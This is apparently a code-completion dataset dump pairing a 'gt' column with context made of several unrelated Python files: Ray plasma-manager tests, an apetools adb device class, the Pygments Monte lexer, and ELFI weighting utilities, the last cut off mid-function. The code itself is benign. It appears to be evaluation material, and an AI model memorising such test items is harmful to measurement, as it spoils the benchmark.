gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from numpy.testing import assert_equal
import os
import random
import signal
import subprocess
import sys
import threading
import time
import unittest
# The ray import must come before the pyarrow import because ray modifies the
# python path so that the right version of pyarrow is found.
import ray
from ray.plasma.utils import (random_object_id,
create_object_with_id, create_object)
from ray import services
import pyarrow as pa
import pyarrow.plasma as plasma
USE_VALGRIND = False
PLASMA_STORE_MEMORY = 1000000000
def random_name():
return str(random.randint(0, 99999999))
def assert_get_object_equal(unit_test, client1, client2, object_id,
memory_buffer=None, metadata=None):
client1_buff = client1.get_buffers([object_id])[0]
client2_buff = client2.get_buffers([object_id])[0]
client1_metadata = client1.get_metadata([object_id])[0]
client2_metadata = client2.get_metadata([object_id])[0]
unit_test.assertEqual(len(client1_buff), len(client2_buff))
unit_test.assertEqual(len(client1_metadata), len(client2_metadata))
# Check that the buffers from the two clients are the same.
assert_equal(np.frombuffer(client1_buff, dtype="uint8"),
np.frombuffer(client2_buff, dtype="uint8"))
# Check that the metadata buffers from the two clients are the same.
assert_equal(np.frombuffer(client1_metadata, dtype="uint8"),
np.frombuffer(client2_metadata, dtype="uint8"))
# If a reference buffer was provided, check that it is the same as well.
if memory_buffer is not None:
assert_equal(np.frombuffer(memory_buffer, dtype="uint8"),
np.frombuffer(client1_buff, dtype="uint8"))
# If reference metadata was provided, check that it is the same as well.
if metadata is not None:
assert_equal(np.frombuffer(metadata, dtype="uint8"),
np.frombuffer(client1_metadata, dtype="uint8"))
DEFAULT_PLASMA_STORE_MEMORY = 10 ** 9
def start_plasma_store(plasma_store_memory=DEFAULT_PLASMA_STORE_MEMORY,
use_valgrind=False, use_profiler=False,
stdout_file=None, stderr_file=None):
"""Start a plasma store process.
Args:
use_valgrind (bool): True if the plasma store should be started inside
of valgrind. If this is True, use_profiler must be False.
use_profiler (bool): True if the plasma store should be started inside
a profiler. If this is True, use_valgrind must be False.
stdout_file: A file handle opened for writing to redirect stdout to. If
no redirection should happen, then this should be None.
stderr_file: A file handle opened for writing to redirect stderr to. If
no redirection should happen, then this should be None.
Return:
A tuple of the name of the plasma store socket and the process ID of
the plasma store process.
"""
if use_valgrind and use_profiler:
raise Exception("Cannot use valgrind and profiler at the same time.")
plasma_store_executable = os.path.join(pa.__path__[0], "plasma_store")
plasma_store_name = "/tmp/plasma_store{}".format(random_name())
command = [plasma_store_executable,
"-s", plasma_store_name,
"-m", str(plasma_store_memory)]
if use_valgrind:
pid = subprocess.Popen(["valgrind",
"--track-origins=yes",
"--leak-check=full",
"--show-leak-kinds=all",
"--leak-check-heuristics=stdstring",
"--error-exitcode=1"] + command,
stdout=stdout_file, stderr=stderr_file)
time.sleep(1.0)
elif use_profiler:
pid = subprocess.Popen(["valgrind", "--tool=callgrind"] + command,
stdout=stdout_file, stderr=stderr_file)
time.sleep(1.0)
else:
pid = subprocess.Popen(command, stdout=stdout_file, stderr=stderr_file)
time.sleep(0.1)
return plasma_store_name, pid
# Plasma client tests were moved into arrow
class TestPlasmaManager(unittest.TestCase):
def setUp(self):
# Start two PlasmaStores.
store_name1, self.p2 = start_plasma_store(
use_valgrind=USE_VALGRIND)
store_name2, self.p3 = start_plasma_store(
use_valgrind=USE_VALGRIND)
# Start a Redis server.
redis_address, _ = services.start_redis("127.0.0.1")
# Start two PlasmaManagers.
manager_name1, self.p4, self.port1 = ray.plasma.start_plasma_manager(
store_name1, redis_address, use_valgrind=USE_VALGRIND)
manager_name2, self.p5, self.port2 = ray.plasma.start_plasma_manager(
store_name2, redis_address, use_valgrind=USE_VALGRIND)
# Connect two PlasmaClients.
self.client1 = plasma.connect(store_name1, manager_name1, 64)
self.client2 = plasma.connect(store_name2, manager_name2, 64)
# Store the processes that will be explicitly killed during tearDown so
# that a test case can remove ones that will be killed during the test.
# NOTE: If this specific order is changed, valgrind will fail.
self.processes_to_kill = [self.p4, self.p5, self.p2, self.p3]
def tearDown(self):
# Check that the processes are still alive.
for process in self.processes_to_kill:
self.assertEqual(process.poll(), None)
# Kill the Plasma store and Plasma manager processes.
if USE_VALGRIND:
# Give processes opportunity to finish work.
time.sleep(1)
for process in self.processes_to_kill:
process.send_signal(signal.SIGTERM)
process.wait()
if process.returncode != 0:
print("aborting due to valgrind error")
os._exit(-1)
else:
for process in self.processes_to_kill:
process.kill()
# Clean up the Redis server.
services.cleanup()
def test_fetch(self):
for _ in range(10):
# Create an object.
object_id1, memory_buffer1, metadata1 = create_object(self.client1,
2000,
2000)
self.client1.fetch([object_id1])
self.assertEqual(self.client1.contains(object_id1), True)
self.assertEqual(self.client2.contains(object_id1), False)
# Fetch the object from the other plasma manager.
# TODO(rkn): Right now we must wait for the object table to be
# updated.
while not self.client2.contains(object_id1):
self.client2.fetch([object_id1])
# Compare the two buffers.
assert_get_object_equal(self, self.client1, self.client2,
object_id1,
memory_buffer=memory_buffer1,
metadata=metadata1)
# Test that we can call fetch on object IDs that don't exist yet.
object_id2 = random_object_id()
self.client1.fetch([object_id2])
self.assertEqual(self.client1.contains(object_id2), False)
memory_buffer2, metadata2 = create_object_with_id(self.client2,
object_id2,
2000, 2000)
# # Check that the object has been fetched.
# self.assertEqual(self.client1.contains(object_id2), True)
# Compare the two buffers.
# assert_get_object_equal(self, self.client1, self.client2, object_id2,
# memory_buffer=memory_buffer2,
# metadata=metadata2)
# Test calling the same fetch request a bunch of times.
object_id3 = random_object_id()
self.assertEqual(self.client1.contains(object_id3), False)
self.assertEqual(self.client2.contains(object_id3), False)
for _ in range(10):
self.client1.fetch([object_id3])
self.client2.fetch([object_id3])
memory_buffer3, metadata3 = create_object_with_id(self.client1,
object_id3,
2000, 2000)
for _ in range(10):
self.client1.fetch([object_id3])
self.client2.fetch([object_id3])
# TODO(rkn): Right now we must wait for the object table to be updated.
while not self.client2.contains(object_id3):
self.client2.fetch([object_id3])
assert_get_object_equal(self, self.client1, self.client2, object_id3,
memory_buffer=memory_buffer3,
metadata=metadata3)
def test_fetch_multiple(self):
for _ in range(20):
# Create two objects and a third fake one that doesn't exist.
object_id1, memory_buffer1, metadata1 = create_object(self.client1,
2000,
2000)
missing_object_id = random_object_id()
object_id2, memory_buffer2, metadata2 = create_object(self.client1,
2000,
2000)
object_ids = [object_id1, missing_object_id, object_id2]
# Fetch the objects from the other plasma store. The second object
# ID should timeout since it does not exist.
# TODO(rkn): Right now we must wait for the object table to be
# updated.
while ((not self.client2.contains(object_id1)) or
(not self.client2.contains(object_id2))):
self.client2.fetch(object_ids)
# Compare the buffers of the objects that do exist.
assert_get_object_equal(self, self.client1, self.client2,
object_id1, memory_buffer=memory_buffer1,
metadata=metadata1)
assert_get_object_equal(self, self.client1, self.client2,
object_id2, memory_buffer=memory_buffer2,
metadata=metadata2)
# Fetch in the other direction. The fake object still does not
# exist.
self.client1.fetch(object_ids)
assert_get_object_equal(self, self.client2, self.client1,
object_id1, memory_buffer=memory_buffer1,
metadata=metadata1)
assert_get_object_equal(self, self.client2, self.client1,
object_id2, memory_buffer=memory_buffer2,
metadata=metadata2)
# Check that we can call fetch with duplicated object IDs.
object_id3 = random_object_id()
self.client1.fetch([object_id3, object_id3])
object_id4, memory_buffer4, metadata4 = create_object(self.client1,
2000,
2000)
time.sleep(0.1)
# TODO(rkn): Right now we must wait for the object table to be updated.
while not self.client2.contains(object_id4):
self.client2.fetch([object_id3, object_id3, object_id4,
object_id4])
assert_get_object_equal(self, self.client2, self.client1, object_id4,
memory_buffer=memory_buffer4,
metadata=metadata4)
def test_wait(self):
# Test timeout.
obj_id0 = random_object_id()
self.client1.wait([obj_id0], timeout=100, num_returns=1)
# If we get here, the test worked.
# Test wait if local objects available.
obj_id1 = random_object_id()
self.client1.create(obj_id1, 1000)
self.client1.seal(obj_id1)
ready, waiting = self.client1.wait([obj_id1], timeout=100,
num_returns=1)
self.assertEqual(set(ready), set([obj_id1]))
self.assertEqual(waiting, [])
# Test wait if only one object available and only one object waited
# for.
obj_id2 = random_object_id()
self.client1.create(obj_id2, 1000)
# Don't seal.
ready, waiting = self.client1.wait([obj_id2, obj_id1], timeout=100,
num_returns=1)
self.assertEqual(set(ready), set([obj_id1]))
self.assertEqual(set(waiting), set([obj_id2]))
# Test wait if object is sealed later.
obj_id3 = random_object_id()
def finish():
self.client2.create(obj_id3, 1000)
self.client2.seal(obj_id3)
t = threading.Timer(0.1, finish)
t.start()
ready, waiting = self.client1.wait([obj_id3, obj_id2, obj_id1],
timeout=1000, num_returns=2)
self.assertEqual(set(ready), set([obj_id1, obj_id3]))
self.assertEqual(set(waiting), set([obj_id2]))
# Test if the appropriate number of objects is shown if some objects
# are not ready.
ready, waiting = self.client1.wait([obj_id3, obj_id2, obj_id1], 100, 3)
self.assertEqual(set(ready), set([obj_id1, obj_id3]))
self.assertEqual(set(waiting), set([obj_id2]))
# Don't forget to seal obj_id2.
self.client1.seal(obj_id2)
# Test calling wait a bunch of times.
object_ids = []
# TODO(rkn): Increasing n to 100 (or larger) will cause failures. The
# problem appears to be that the number of timers added to the manager
# event loop slow down the manager so much that some of the
# asynchronous Redis commands timeout triggering fatal failure
# callbacks.
n = 40
for i in range(n * (n + 1) // 2):
if i % 2 == 0:
object_id, _, _ = create_object(self.client1, 200, 200)
else:
object_id, _, _ = create_object(self.client2, 200, 200)
object_ids.append(object_id)
# Try waiting for all of the object IDs on the first client.
waiting = object_ids
retrieved = []
for i in range(1, n + 1):
ready, waiting = self.client1.wait(waiting, timeout=1000,
num_returns=i)
self.assertEqual(len(ready), i)
retrieved += ready
self.assertEqual(set(retrieved), set(object_ids))
ready, waiting = self.client1.wait(object_ids, timeout=1000,
num_returns=len(object_ids))
self.assertEqual(set(ready), set(object_ids))
self.assertEqual(waiting, [])
# Try waiting for all of the object IDs on the second client.
waiting = object_ids
retrieved = []
for i in range(1, n + 1):
ready, waiting = self.client2.wait(waiting, timeout=1000,
num_returns=i)
self.assertEqual(len(ready), i)
retrieved += ready
self.assertEqual(set(retrieved), set(object_ids))
ready, waiting = self.client2.wait(object_ids, timeout=1000,
num_returns=len(object_ids))
self.assertEqual(set(ready), set(object_ids))
self.assertEqual(waiting, [])
# Make sure that wait returns when the requested number of object IDs
# are available and does not wait for all object IDs to be available.
object_ids = [random_object_id() for _ in range(9)] + \
[plasma.ObjectID(20 * b'\x00')]
object_ids_perm = object_ids[:]
random.shuffle(object_ids_perm)
for i in range(10):
if i % 2 == 0:
create_object_with_id(self.client1, object_ids_perm[i], 2000,
2000)
else:
create_object_with_id(self.client2, object_ids_perm[i], 2000,
2000)
ready, waiting = self.client1.wait(object_ids, num_returns=(i + 1))
self.assertEqual(set(ready), set(object_ids_perm[:(i + 1)]))
self.assertEqual(set(waiting), set(object_ids_perm[(i + 1):]))
def test_transfer(self):
num_attempts = 100
for _ in range(100):
# Create an object.
object_id1, memory_buffer1, metadata1 = create_object(self.client1,
2000,
2000)
# Transfer the buffer to the the other Plasma store. There is a
# race condition on the create and transfer of the object, so keep
# trying until the object appears on the second Plasma store.
for i in range(num_attempts):
self.client1.transfer("127.0.0.1", self.port2, object_id1)
buff = self.client2.get_buffers(
[object_id1], timeout_ms=100)[0]
if buff is not None:
break
self.assertNotEqual(buff, None)
del buff
# Compare the two buffers.
assert_get_object_equal(self, self.client1, self.client2,
object_id1, memory_buffer=memory_buffer1,
metadata=metadata1)
# # Transfer the buffer again.
# self.client1.transfer("127.0.0.1", self.port2, object_id1)
# # Compare the two buffers.
# assert_get_object_equal(self, self.client1, self.client2,
# object_id1,
# memory_buffer=memory_buffer1,
# metadata=metadata1)
# Create an object.
object_id2, memory_buffer2, metadata2 = create_object(self.client2,
20000, 20000)
# Transfer the buffer to the the other Plasma store. There is a
# race condition on the create and transfer of the object, so keep
# trying until the object appears on the second Plasma store.
for i in range(num_attempts):
self.client2.transfer("127.0.0.1", self.port1, object_id2)
buff = self.client1.get_buffers(
[object_id2], timeout_ms=100)[0]
if buff is not None:
break
self.assertNotEqual(buff, None)
del buff
# Compare the two buffers.
assert_get_object_equal(self, self.client1, self.client2,
object_id2, memory_buffer=memory_buffer2,
metadata=metadata2)
def test_illegal_functionality(self):
# Create an object id string.
# object_id = random_object_id()
# Create a new buffer.
# memory_buffer = self.client1.create(object_id, 20000)
# This test is commented out because it currently fails.
# # Transferring the buffer before sealing it should fail.
# self.assertRaises(Exception,
# lambda : self.manager1.transfer(1, object_id))
pass
def test_stresstest(self):
a = time.time()
object_ids = []
for i in range(10000): # TODO(pcm): increase this to 100000.
object_id = random_object_id()
object_ids.append(object_id)
self.client1.create(object_id, 1)
self.client1.seal(object_id)
for object_id in object_ids:
self.client1.transfer("127.0.0.1", self.port2, object_id)
b = time.time() - a
print("it took", b, "seconds to put and transfer the objects")
class TestPlasmaManagerRecovery(unittest.TestCase):
def setUp(self):
# Start a Plasma store.
self.store_name, self.p2 = start_plasma_store(
use_valgrind=USE_VALGRIND)
# Start a Redis server.
self.redis_address, _ = services.start_redis("127.0.0.1")
# Start a PlasmaManagers.
manager_name, self.p3, self.port1 = ray.plasma.start_plasma_manager(
self.store_name,
self.redis_address,
use_valgrind=USE_VALGRIND)
# Connect a PlasmaClient.
self.client = plasma.connect(self.store_name, manager_name, 64)
# Store the processes that will be explicitly killed during tearDown so
# that a test case can remove ones that will be killed during the test.
# NOTE: The plasma managers must be killed before the plasma store
# since plasma store death will bring down the managers.
self.processes_to_kill = [self.p3, self.p2]
def tearDown(self):
# Check that the processes are still alive.
for process in self.processes_to_kill:
self.assertEqual(process.poll(), None)
# Kill the Plasma store and Plasma manager processes.
if USE_VALGRIND:
# Give processes opportunity to finish work.
time.sleep(1)
for process in self.processes_to_kill:
process.send_signal(signal.SIGTERM)
process.wait()
if process.returncode != 0:
print("aborting due to valgrind error")
os._exit(-1)
else:
for process in self.processes_to_kill:
process.kill()
# Clean up the Redis server.
services.cleanup()
def test_delayed_start(self):
num_objects = 10
# Create some objects using one client.
object_ids = [random_object_id() for _ in range(num_objects)]
for i in range(10):
create_object_with_id(self.client, object_ids[i], 2000, 2000)
# Wait until the objects have been sealed in the store.
ready, waiting = self.client.wait(object_ids, num_returns=num_objects)
self.assertEqual(set(ready), set(object_ids))
self.assertEqual(waiting, [])
# Start a second plasma manager attached to the same store.
manager_name, self.p5, self.port2 = ray.plasma.start_plasma_manager(
self.store_name, self.redis_address, use_valgrind=USE_VALGRIND)
self.processes_to_kill = [self.p5] + self.processes_to_kill
# Check that the second manager knows about existing objects.
client2 = plasma.connect(self.store_name, manager_name, 64)
ready, waiting = [], object_ids
while True:
ready, waiting = client2.wait(object_ids, num_returns=num_objects,
timeout=0)
if len(ready) == len(object_ids):
break
self.assertEqual(set(ready), set(object_ids))
self.assertEqual(waiting, [])
if __name__ == "__main__":
if len(sys.argv) > 1:
# Pop the argument so we don't mess with unittest's own argument
# parser.
if sys.argv[-1] == "valgrind":
arg = sys.argv.pop()
USE_VALGRIND = True
print("Using valgrind for tests")
unittest.main(verbosity=2)
|
|
from apetools.baseclass import BaseClass
from basedevice import BaseDevice
from apetools.connections.adbconnection import ADBShellConnection
from apetools.commands.svc import Svc
from apetools.commands.netcfg import NetcfgCommand
from apetools.commands.iwcommand import IwCommand
from apetools.commands.wlcommand import WlCommand
from apetools.commands.wificommand import WifiCommand
from apetools.commands.wpacli import WpaCliCommand
from apetools.commons.errors import CommandError
commands = {"iw":IwCommand,
'wl':WlCommand,
'wifi':WifiCommand,
'wpa_cli':WpaCliCommand}
class AdbDevice(BaseDevice):
"""
A class to bundle commands to control an adb device
"""
def __init__(self, *args, **kwargs):
"""
:param:
- `connection`: An device connection
"""
super(AdbDevice, self).__init__(*args, **kwargs)
self._wifi_control = None
self._wifi_querier = None
self._netcfg = None
self._wifi_commands = None
return
@property
def channel(self):
"""
:return: the channel for the current wifi connection
"""
return self.wifi_querier.channel
@property
def rssi(self):
"""
:return: the current RSSI
"""
return self.wifi_querier.rssi
@property
def bitrate(self):
"""
:return: the current bitrate
"""
return self.wifi_querier.bitrate
@property
def noise(self):
"""
:return: the current noise
"""
return self.wifi_querier.noise
@property
def ssid(self):
"""
:return: the ssid of the attached AP
"""
return self._wifi_querier.ssid
@property
def bssid(self):
"""
:return: the MAC address of the attached AP
"""
return self._wifi_querier.bssid
@property
def mac_address(self):
"""
:return: devices mac address
"""
if self._mac_address is None:
if "wpa_cli" in self.wifi_commands:
self._mac_address = commands['wpa_cli'](connection=self.connection,
interface=self.interface).mac_address
else:
self._mac_address = self.wifi_querier.mac_address
return self._mac_address
@property
def wifi_commands(self):
"""
:return: list of available wifi commands
"""
if self._wifi_commands is None:
self._wifi_commands = AdbWifiCommandFinder()(self.connection)
return self._wifi_commands
@property
def wifi_querier(self):
"""
:return: command to query wifi information
"""
if self._wifi_querier is None:
self._wifi_querier = commands[self.wifi_commands[0]](connection=self.connection,
interface=self.interface)
return self._wifi_querier
@property
def netcfg(self):
"""
:return: NetcfgCommand
"""
if self._netcfg is None:
self._netcfg = NetcfgCommand(self.connection,
self.interface)
return self._netcfg
@property
def wifi_control(self):
"""
:return: Svc command (enable disable radio)
"""
if self._wifi_control is None:
self._wifi_control = Svc(connection=self.connection)
return self._wifi_control
@property
def connection(self):
"""
:return: connection passed in or ADBShellConnection if not given
"""
if self._connection is None:
self._connection = ADBShellConnection()
return self._connection
def wake_screen(self):
"""
Wake the screen
"""
raise NotImplementedError("Wake Screen not ready yet")
return
def display(self, message):
"""
Display a message on the screen
"""
raise NotImplementedError("Display <message> not done yet")
return
def disable_wifi(self):
"""
:postcondition: WiFi radio disabled
"""
self.wifi_control.disable_wifi()
return
def enable_wifi(self):
"""
:postcondition: WiFi radio enabled
"""
self.wifi_control.enable_wifi()
return
def get_wifi_info(self):
"""
:rtype: StringType
:return: The Wifi Info
"""
return "SSID:{0}\nBSSID:{1}\nMAC:{2}\nChannel:{3}\nIP:{4}\nRSSI:{5}\nNoise:{6}\nBitrate:{7}".format(self.ssid,
self.bssid,
self.mac_address,
self.channel,
self.ip_address,
self.rssi,
self.noise,
self.bitrate)
def log(self, message):
"""
:postcondition: message sent to the connection
"""
self.connection.log(message)
return
def root(self):
"""
:postcondition: `su` sent to the device
"""
self.connection.su(timeout=1)
return
@property
def address(self):
"""
:return: ip address of interface
"""
return self.netcfg.ip_address
# end class AdbDevice
# a tuple of commands to try
wifi_commands = ("wifi wl iw wpa_cli".split())
class AdbWifiCommandFinder(BaseClass):
"""
A finder of the main wifi command.
"""
def __call__(self, connection):
"""
:param:
- `connection`: An ADB Connection to the device
:return: string identifier of primary wifi query command
"""
super(AdbWifiCommandFinder, self).__init__()
commands = []
#import pudb; pudb.set_trace()
for command in wifi_commands:
valid = True
try:
with connection.lock:
output, error = getattr(connection, command)("-v")
for line in output:
if "not found" in line:
valid = False
break
if valid:
commands.append(command)
except CommandError as error:
self.logger.debug(error)
return commands
# end class AdbWifiCommandFinder
if __name__ == "__main__":
from apetools.connections.adbconnection import ADBShellSSHConnection
import sys
c = ADBShellSSHConnection(hostname="lancet", username="allion")
a = AdbDevice(connection = c, interface="wlan0", csv=True)
sys.stdout.write(a.wifi_info)
sys.stdout.write(a.wifi_info)
|
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.monte
~~~~~~~~~~~~~~~~~~~~~
Lexer for the Monte programming language.
:copyright: Copyright 2016 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.token import Comment, Error, Keyword, Name, Number, Operator, \
Punctuation, String, Whitespace
from pygments.lexer import RegexLexer, include, words
__all__ = ['MonteLexer']
# `var` handled separately
# `interface` handled separately
_declarations = ['bind', 'def', 'fn', 'object']
_methods = ['method', 'to']
_keywords = [
'as', 'break', 'catch', 'continue', 'else', 'escape', 'exit', 'exports',
'extends', 'finally', 'for', 'guards', 'if', 'implements', 'import',
'in', 'match', 'meta', 'pass', 'return', 'switch', 'try', 'via', 'when',
'while',
]
_operators = [
# Unary
'~', '!',
# Binary
'+', '-', '*', '/', '%', '**', '&', '|', '^', '<<', '>>',
# Binary augmented
'+=', '-=', '*=', '/=', '%=', '**=', '&=', '|=', '^=', '<<=', '>>=',
# Comparison
'==', '!=', '<', '<=', '>', '>=', '<=>',
# Patterns and assignment
':=', '?', '=~', '!~', '=>',
# Calls and sends
'.', '<-', '->',
]
_escape_pattern = (
r'(?:\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}|\\U[0-9a-fA-F]{8}|'
r'\\["\'\\bftnr])')
#_char = _escape_chars + [('.', String.Char)]
_identifier = '[_a-zA-Z][_0-9a-zA-Z]*'
_constants = [
# Void constants
'null',
# Bool constants
'false', 'true',
# Double constants
'Infinity', 'NaN',
# Special objects
'M', 'Ref', 'throw', 'traceln',
]
_guards = [
'Any', 'Binding', 'Bool', 'Bytes', 'Char', 'DeepFrozen', 'Double',
'Empty', 'Int', 'List', 'Map', 'Near', 'NullOk', 'Same', 'Selfless',
'Set', 'Str', 'SubrangeGuard', 'Transparent', 'Void',
]
_safeScope = [
'_accumulateList', '_accumulateMap', '_auditedBy', '_bind',
'_booleanFlow', '_comparer', '_equalizer', '_iterForever', '_loop',
'_makeBytes', '_makeDouble', '_makeFinalSlot', '_makeInt', '_makeList',
'_makeMap', '_makeMessageDesc', '_makeOrderedSpace', '_makeParamDesc',
'_makeProtocolDesc', '_makeSourceSpan', '_makeString', '_makeVarSlot',
'_makeVerbFacet', '_mapExtract', '_matchSame', '_quasiMatcher',
'_slotToBinding', '_splitList', '_suchThat', '_switchFailed',
'_validateFor', 'b__quasiParser', 'eval', 'import', 'm__quasiParser',
'makeBrandPair', 'makeLazySlot', 'safeScope', 'simple__quasiParser',
]
class MonteLexer(RegexLexer):
"""
Lexer for the `Monte <https://monte.readthedocs.io/>`_ programming language.
.. versionadded:: 2.2
"""
name = 'Monte'
aliases = ['monte']
filenames = ['*.mt']
tokens = {
'root': [
# Comments
(r'#[^\n]*\n', Comment),
# Docstrings
# Apologies for the non-greedy matcher here.
(r'/\*\*.*?\*/', String.Doc),
# `var` declarations
(r'\bvar\b', Keyword.Declaration, 'var'),
# `interface` declarations
(r'\binterface\b', Keyword.Declaration, 'interface'),
# method declarations
(words(_methods, prefix='\\b', suffix='\\b'),
Keyword, 'method'),
# All other declarations
(words(_declarations, prefix='\\b', suffix='\\b'),
Keyword.Declaration),
# Keywords
(words(_keywords, prefix='\\b', suffix='\\b'), Keyword),
# Literals
('[+-]?0x[_0-9a-fA-F]+', Number.Hex),
(r'[+-]?[_0-9]+\.[_0-9]*([eE][+-]?[_0-9]+)?', Number.Float),
('[+-]?[_0-9]+', Number.Integer),
("'", String.Double, 'char'),
('"', String.Double, 'string'),
# Quasiliterals
('`', String.Backtick, 'ql'),
# Operators
(words(_operators), Operator),
# Verb operators
(_identifier + '=', Operator.Word),
# Safe scope constants
(words(_constants, prefix='\\b', suffix='\\b'),
Keyword.Pseudo),
# Safe scope guards
(words(_guards, prefix='\\b', suffix='\\b'), Keyword.Type),
# All other safe scope names
(words(_safeScope, prefix='\\b', suffix='\\b'),
Name.Builtin),
# Identifiers
(_identifier, Name),
# Punctuation
(r'\(|\)|\{|\}|\[|\]|:|,', Punctuation),
# Whitespace
(' +', Whitespace),
# Definite lexer errors
('=', Error),
],
'char': [
# It is definitely an error to have a char of width == 0.
("'", Error, 'root'),
(_escape_pattern, String.Escape, 'charEnd'),
('.', String.Char, 'charEnd'),
],
'charEnd': [
("'", String.Char, '#pop:2'),
# It is definitely an error to have a char of width > 1.
('.', Error),
],
# The state of things coming into an interface.
'interface': [
(' +', Whitespace),
(_identifier, Name.Class, '#pop'),
include('root'),
],
# The state of things coming into a method.
'method': [
(' +', Whitespace),
(_identifier, Name.Function, '#pop'),
include('root'),
],
'string': [
('"', String.Double, 'root'),
(_escape_pattern, String.Escape),
(r'\n', String.Double),
('.', String.Double),
],
'ql': [
('`', String.Backtick, 'root'),
(r'\$' + _escape_pattern, String.Escape),
(r'\$\$', String.Escape),
(r'@@', String.Escape),
(r'\$\{', String.Interpol, 'qlNest'),
(r'@\{', String.Interpol, 'qlNest'),
(r'\$' + _identifier, Name),
('@' + _identifier, Name),
('.', String.Backtick),
],
'qlNest': [
(r'\}', String.Interpol, '#pop'),
include('root'),
],
# The state of things immediately following `var`.
'var': [
(' +', Whitespace),
(_identifier, Name.Variable, '#pop'),
include('root'),
],
}
|
|
"""This module contains utilities for methods."""
import logging
from math import ceil
from typing import Dict, List, Optional, Union
import numpy as np
import scipy.stats as ss
logger = logging.getLogger(__name__)
def arr2d_to_batch(x, names):
"""Convert a 2d array to a batch dictionary columnwise.
Parameters
----------
x : np.ndarray
2d array of values
names : list[str]
List of names
Returns
-------
dict
A batch dictionary
"""
# TODO: support vector parameter nodes
try:
x = x.reshape((-1, len(names)))
except BaseException:
raise ValueError("A dimension mismatch in converting array to batch dictionary. "
"This may be caused by multidimensional "
"prior nodes that are not yet supported.")
batch = {p: x[:, i] for i, p in enumerate(names)}
return batch
def batch_to_arr2d(batches, names):
"""Convert batches into a single numpy array.
Parameters
----------
batches : dict or list
A list of batches or a single batch
names : list
Name of outputs to include in the array. Specifies the order.
Returns
-------
np.array
2d, where columns are batch outputs
"""
if not batches:
return []
if not isinstance(batches, list):
batches = [batches]
rows = []
for batch_ in batches:
rows.append(np.column_stack([batch_[n] for n in names]))
return np.vstack(rows)
def ceil_to_batch_size(num, batch_size):
"""Calculate how many full batches in num.
Parameters
----------
num : int
batch_size : int
"""
return int(batch_size * ceil(num / batch_size))
def normalize_weights(weights):
"""Normalize weights to sum to unity."""
w = np.atleast_1d(weights)
if np.any(w < 0):
raise ValueError("Weights must be positive")
wsum = np.sum(weights)
if wsum == 0:
raise ValueError("All weights are zero")
return w / wsum
def compute_ess(weights: Union[None, np.ndarray] = None):
"""Compute the Effective Sample Size (ESS). Weights are assumed to be unnormalized.
Parameters
----------
weights: unnormalized weights
"""
# normalize weights
weights = normalize_weights(weights)
# compute ESS
numer = np.square(np.sum(weights))
denom = np.sum(np.square(weights))
return numer / denom
def weighted_var(x, weights=None):
"""Unbiased weighted variance (sample variance) for the components of x.
The weights are assumed to be non random (reliability weights).
Parameters
----------
x : np.ndarray
1d or 2d with observations in rows
weights : np.ndarray or None
1d array of weights. None defaults to standard variance.
Returns
-------
s2 : np.array
1d vector of component variances
References
----------
[1] https://en.wikipedia.org/wiki/Weighted_arithmetic_mean#Weighted_sample_variance
"""
if weights is None:
weights = np.ones(len(x))
V_1 = np.sum(weights)
V_2 = np.sum(weights ** 2)
xbar = np.average(x, weights=weights, axis=0)
numerator = weights.dot((x - xbar) ** 2)
s2 = numerator / (V_1 - (V_2 / V_1))
return s2
class GMDistribution:
"""Gaussian mixture distribution with a shared covariance matrix."""
@classmethod
def pdf(cls, x, means, cov=1, weights=None):
"""Evaluate the density at points x.
Parameters
----------
x : array_like
Scalar, 1d or 2d array of points where to evaluate, observations in rows
means : array_like
Means of the Gaussian mixture components. It is assumed that means[0] contains
the mean of the first gaussian component.
weights : array_like
1d array of weights of the gaussian mixture components
cov : array_like, float
A shared covariance matrix for the mixture components
"""
means, weights = cls._normalize_params(means, weights)
ndim = np.asanyarray(x).ndim
if means.ndim == 1:
x = np.atleast_1d(x)
if means.ndim == 2:
x = np.atleast_2d(x)
d = np.zeros(len(x))
for m, w in zip(means, weights):
d += w * ss.multivariate_normal.pdf(x, mean=m, cov=cov)
# Cast to correct ndim
if ndim == 0 or (ndim == 1 and means.ndim == 2):
return d.squeeze()
else:
return d
@classmethod
def logpdf(cls, x, means, cov=1, weights=None):
"""Evaluate the log density at points x.
Parameters
----------
x : array_like
Scalar, 1d or 2d array of points where to evaluate, observations in rows
means : array_like
Means of the Gaussian mixture components. It is assumed that means[0] contains
the mean of the first gaussian component.
weights : array_like
1d array of weights of the gaussian mixture components
cov : array_like, float
A shared covariance matrix for the mixture components
"""
return np.log(cls.pdf(x, means=means, cov=cov, weights=weights))
@classmethod
def rvs(cls, means, cov=1, weights=None, size=1, prior_logpdf=None, random_state=None):
"""Draw random variates from the distribution.
Parameters
----------
means : array_like
Means of the Gaussian mixture components
cov : array_like, optional
A shared covariance matrix for the mixture components
weights : array_like, optional
1d array of weights of the gaussian mixture components
size : int or tuple or None, optional
Number or shape of samples to draw (a single sample has the shape of `means`).
If None, return one sample without an enclosing array.
prior_logpdf : callable, optional
Can be used to check validity of random variable.
random_state : np.random.RandomState, optional
"""
random_state = random_state or np.random
means, weights = cls._normalize_params(means, weights)
if size is None:
size = 1
no_wrap = True
else:
no_wrap = False
output = np.empty((size,) + means.shape[1:])
n_accepted = 0
n_left = size
trials = 0
while n_accepted < size:
inds = random_state.choice(len(means), size=n_left, p=weights)
rvs = means[inds]
perturb = ss.multivariate_normal.rvs(mean=means[0] * 0,
cov=cov,
random_state=random_state,
size=n_left)
x = rvs + perturb
# check validity of x
if prior_logpdf is not None:
x = x[np.isfinite(prior_logpdf(x))]
n_accepted1 = len(x)
output[n_accepted: n_accepted + n_accepted1] = x
n_accepted += n_accepted1
n_left -= n_accepted1
trials += 1
if trials == 100:
logger.warning("SMC: It appears to be difficult to find enough valid proposals "
"with prior pdf > 0. ELFI will keep trying, but you may wish "
"to kill the process and adjust the model priors.")
logger.debug('Needed %i trials to find %i valid samples.', trials, size)
if no_wrap:
return output[0]
else:
return output
@staticmethod
def _normalize_params(means, weights):
means = np.atleast_1d(np.squeeze(means))
if means.ndim > 2:
raise ValueError('means.ndim = {} but must be at most 2.'.format(means.ndim))
if weights is None:
weights = np.ones(len(means))
weights = normalize_weights(weights)
return means, weights
def numgrad(fn, x, h=None, replace_neg_inf=True):
"""Naive numeric gradient implementation for scalar valued functions.
Parameters
----------
fn
x : np.ndarray
